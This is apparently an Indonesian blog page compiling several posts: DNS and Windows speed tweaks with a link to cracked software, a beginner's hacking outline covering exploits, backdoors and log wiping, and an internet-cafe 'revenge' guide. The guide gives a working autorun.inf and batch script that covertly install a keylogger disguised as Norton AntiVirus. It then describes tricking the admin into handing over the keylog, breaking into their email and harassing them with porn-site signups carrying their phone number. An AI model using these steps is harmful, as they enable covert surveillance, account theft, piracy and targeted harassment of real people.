Senin, 15 Juni 2009

Manfaatkan Open DNS

Tips berikut ini bisa dicoba untuk mempercepat koneksi internet dan mempercepat waktu loading halaman web dari browser kita, dengan cara mengubah setting DNS koneksi internet kita. Aku dapet info awalnya dari sebuah forum, dan setelah aku coba hasil speed test nya lumayan juga.
Berikut ini hasil speed test ketika pakai DNS default milik Indosat IM2 :



Dan ini hasil speed test setelah setting DNS aku ganti :



Lumayan ada peningkatan download speed dan upload speed-nya.
Buat yang belum tau apa itu DNS (Domain Name Server), mungkin penjelasan kasarnya sbb : tiap komputer yang konek ke internet punya identifikasi/alamat yang disebut nomor IP. Misal, IP-nya Google adalah 208.67.219.231. Nomor-nomor IP ini berupa deretan angka yang tentunya susah buat dihapal, contohnya, lebih gampang bagi kita buat menghapal bahwa kalo mau buka Google cukup ketik nama aliasnya yang www.google.com di browser daripada harus hapalin alamat aslinya yang 208.67.219.231 itu.

Lalu bagaimana prosesnya tahu nama alias xxx itu mengarah ke alamat IP yang mana?

Untuk menterjemahkan nama alias menjadi alamat IP yang dituju itulah gunanya server DNS. DNS ini berisi database yang menyimpan data nomor-nomor IP beserta asosiasi nama aliasnya. Jadi kita cukup melakukan setting untuk mengarahkan koneksi internet kita ke server DNS. Lalu kalau kita mengetikan nama alias www.google.com di browser, maka DNS server yang akan mencari nomor IP yang dimaksud.

Kalau DNS servernya telmi (telat mikir), ya browser kita pasti ikutan bolot juga.
Setting DNS bisa dilihat dari menu Start - Control Panel - Network Connection, lalu pilih koneksi internet kita dan buka properties-nya. Pilih Tab “Networking”, pilih internet protocol (tcp/ip) lalu klik tombol Properties.



Atau kalau koneksi internet pake aplikasi dari modem bisa di set dari dalam aplikasi modemnya itu. Kalau aku pakai aplikasi dari modem 3G bawaan Indosat M2, settingnya ada di menu Setting - Network Settings, seperti di bawah ini.



Ok. Langsung saja kita coba ganti DNS nya. Kalau defaultnya DNS punya Indosat M2 biasanya ke nomor IP 202.155.0.10 untuk prefered dan 202.155.0.15 untuk alternate DNS. Dari pada nyolong-pinjam DNS orang lain yang mungkin suatu saat diblok, kita akan ganti pakai Open DNS (DNS public yang legal buat dipakai bebas) yang berikut ini :

• Preferred DNS server: 208.67.222.222
• Alternate DNS server: 208.67.220.220

Perlu diketahui bahwa DNS Default Speedy :

202.134.0.155 – nsjkt1.telkom.net.id
203.130.196.5 – nsjkt3.telkom.net.id

Lack dalam update DNS Speedy menyebabkan banyak website-website baru yang tidak dapat diakses melalui speedy, bahkan extremnya, banyak juga website2 walaupun yang lama yang tidak bisa diakses dari DNS diatas.

Solusinya, kita bisa menggunakan alternatif DNS Speedy yang lain atau menggunakan DNS lain misal dari OpenDNS, berikut list DNS Speedy selain DNS default diatas :

* 203.130.196.155 – nsjkt2.telkom.net.id
* 202.134.2.5 – nsbdg1.telkom.net.id / ns2.telkom.net.id
* 202.134.1.10 – nssby1.telkom.net.id
* 203.130.208.18 – nssmg1.telkom.net.id
* 203.130.206.250 – nsmdn1.telkom.net.id
* 203.130.196.6 – ns1.telkom.net.id
* 202.134.1.7 – ns3.telkom.net.id

Sedangkan untuk OpenDNS (support web filtering, dns base) bisa menggunakan IP

* 208.67.222.222
* 208.67.220.220

Semoga membantu...

Menambah Kecepatan Koneksi Internet v.2

Menambah kecepatan akses internet sangat diinginkan para pengguna internet. Ada banyak cara digunakan untuk menambah kecepatan akses koneksi internet, dari cara simpel menonaktifkan loading gambar pada browser hingga penggunaan software tertentu dari gratis hingga berbayar. Posting ini hanya akan memberi 2 alternatif cara menambah kecepatan koneksi internet anda.

Tweak 1: Un-reserving bandwidth
Secara default, XP menyimpan 20% dari bandwith anda untuk penggunaan aplikasi dari XP itu sendiri. Kita bisa ubah menjadi 0% untuk menambah kecepatan akses internet anda.

1. Buka Group Policy Editor dengan mengetikkan gpedit.msc pada Run box (Windows Start kemudian klik Run).

2. Pada panel sebelah kiri, klik Computer Configuration/Administrative Templates/Network/QOS Packet.

3. Pada panel kanan, terdapat menu Limit reservable bandwidth, klik kanan dan pilih properties.

4. Pada tab setting, pilih atau klik pada Radio Button Enabled kemudian ubah Bandwith limit ( % ) dibawahnya menjadi 0.

5. Klik OK lalu tutup Group Policy Editor.

Selesai! Mudah dan cepat kan?!

Tweak 2: Optimizing TCP/IP settings


Tweak ke-dua ini, Anda membutuhkan freeware SG TCP Optimizer. Aplikasi kecil ini sanggup meng-optimalkan cara kerja PC saat mengirim
dan menerima data packets saat Anda terhubung ke internet. Tools ini lebih efektif untuk pengguna koneksi broadband, walapun bisa digunakan untuk semua jenis koneksi internet.

1. Download SG TCP Optimizer. Tanpa perlu install, cukup double-click dan tools ini akan running. Lihat gambar dibawah ini untuk leb
ih detail :

3. Kita hanya akan bekerja dengan beberapa klik saja, abaikan saja menu lainnya. Dibawah tab General Settings, drag slider-nya pada kecepatan koneksi yang Anda inginkan. Lalu, pada jendela yang sama di bagian bawah, pilih radio button Optimal Settings dan click Apply Changes.

4. Selanjutnya Anda akan temui tampilan seperti gamb
ar dibawah ini.


5. Pastikan pada box Backup dicentang lalu click OK.

6. Restart PC Anda.

7. Setelah restart, coba browsing internet Anda pada halaman web yang tidak terlalu “berat” atau memakan bandwith terlalu banyak. Jika anda merasa kecepatan koneksi internet justru melambat atau menurun Anda bisa melakukan restore pada original setting. Start SG TCP Optimizer, click File dan pilih restore backed up settings. Anda akan dibawa pada dialog box yang Anda gunakan untuk navigasi tempat dimana mendownload program. Disitu Anda akan menemui file dengan extension .spg dan filename yang mengandung tanggal. Contoh, jika anda melakukan perubahan 21 February maka “sg_backup_2008-02-21-xxxx.spg” merupakan filename-nya, dimana xxxx bisa diisi dengan nomor apa saja. Buka file tersebut. Anda akan dibawa pada dialog box seperti yang ditunjukkan diatas. Click OK lalu restart. Original settings Anda telah kembali

dan untuk sebagai tambahan artikel ini software Untuk Menambah kecepatan Internet!!!
Untuk yang merasa internet anda kurang maksimal kecepatanya, ini mungkin bisa sedikit membantu..Menambah kecepatan koneksi internet dapat menggunakan sofware Speed Connect Internet Accelerator v7.5. Untuk mendapatkan sofware tersebut download aja di http://www.d60pc.com/2008/08/02/speed-connect-internet-accelerator-v75-download/. download full version dan cracknya, disitu juga udah dijelaskan bagaimana cara installnya..namun jangan lupa file dalam bentuk rar ada passwordnya, saya ingatkan password=www.d60pc.net.
http://ebsoft.web.id/forum/software/software-untuk-menambah-kecepatan-internet/#p640





Sumber : resep.web.id

Tutorial Belajar Hacking untuk pengembangan

Intro:

Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.

Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.

Bagian 1

*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ’standar’, hacking sebenarnya tidak harus selalu sesuai dengan ’standar’ ini.

Hacking buat pemula

- by aCh

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan…
Pro dan Kontra Hacking....

Okeh, sekarang waktunya melakukan aksi…

1. Fase Persiapan

~ Mengumpulkan informasi sebanyak-banyaknya

- Secara Aktif : - portscanning

- network mapping

- OS Detection

- application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat

- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)

- via internet registries (informasi domain, IP Addres)

- Website yang menjadi terget

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->

$gcc -o exploit exploit.c

$./exploit

# hostname (# tanda mendapatkan akses root)

remote host -> $gcc -o exploit exploit.c

$./exploit -t www.target.com

# (klo beruntung mendapatkan akes root)

~ Brute Force

- Secara berulang melakukan percobaan otentifikasi.

- Menebak username dan password.

- Cracking password file

~ Social Engineering

- Memperdayai user untuk memeberi tahu Username dan password

- Intinya ngibulin user….



3. Fase Setelah Eksekusi

~ Menginstall backdoor, trojans, dan rootkit

~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin

~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!

Tips buat ngerjain pemilik warnet

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguna jasa layanan internet cafe (warnet) menjadi kurang nyaman.

1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai tak jarang lupa diri Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan melarang user untuk melakukan segala bentuk transfer file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi "rongsokan" tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure.


2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan orang.. mendapatkan password sang admin. Partner kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di halaman member kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah-langkah berikut:

---[1 Bukalah Notepad kemudian ketik satu baris script berikut:
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama Autorun.inf lalu klik tombol [save].

---[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu ketik script berikut:
Code:

@echo off echo Norton Antivirus 2006 echo Scanning disk drive... echo Please wait... copy navw32.exe %windir%\navw32.exe call %windir%\navw32.exe echo. echo. echo. echo. echo. echo. echo. echo. Scanning complette! No virus threat detected! echo. cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama nav.bat lalu klik tombol [save].

---[3. Persiapkan beberapa file micr*soft word documents (bisa diganti dengan file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin baik karena file keyloger kamu akan semakin tersamarkan.

---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti biasa dan jangan gugup selayaknya para koruptor yang sering nampang di satasion-stasion TV tanpa rasa malu. Setelah kamu login ke billing komputer user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf akan memproses file nav.bat ---> file nav.bat akan menduplikasi file navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama navw32.dll beratribut hidden.
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi-lagi) kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows sang admin? Ikuti langkah-langkah pada serangan kedua.

3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah secara wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan katakan pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Mnurut pesan Error yang muncul, file navw32.dll yang berada di directory windows hilang. File tersebut beratribut hidden. Tolong doong copykan dari komputer ini. Kebetulan versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu. Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file tersebut bukan file system, namun file hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.

4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya.
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan dilakukan deech..). Daftarkan emailnya ke berbagai situs-situs porno dan postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau jika berbahasa Inggris:

Dear,
Wanna play "freestyle" with mw? Please call me : 062-021-blablabla
You may F**k me for free!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-kata yang yahuud!!
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun! Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa maksudnya
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unscribe dari milis-milis tersebut, telepon rumahnya masih terus-terusan menjerit-jerit dengan jeritan indah

5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun selalu tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive. Setelah CD masuk, tetap tekan tombol shift sampai kira-kira 25 detik. Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui windows Explorer. Klik pada area folder tree sebelah kiri, jangan pada daftar drive sebelah kanan karena fitur autorun akan aktif.

6. Penutup

---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana namun berdampak luar biasa, untuk memancing ide kreatif anda.

---[+ Referensi
Self implementing

Note:
Sebelum anda menerapkan ide-ide diatas, saya mohon dengan sangat agar anda brfikir jernih dan mengunakan akal sehat anda. Kalau misalnya sang admin telah menolak cinta anda, jangan lantas seenaknya melakukan pembalasan dengan cara diatas. Ada baiknya anda pergi ke market terdekat untuk membeli seribu cermin. Berkacalah!! perbaiki penampilan dan perilaku anda!
Tapi kalau sang admin adalah orang-orang sombong dan telah melakukan kecurangan, menganggap rendah anda dan mengklaim diri mereka adalah super-Hacker, maka anda bisa membungkam mulut besar mereka dengan cara ini.

================================================== =======

catatan :

ini sekedar buat input buat admin atau owner agar selalu menjaga security dari warnetnya supaya benar2 aman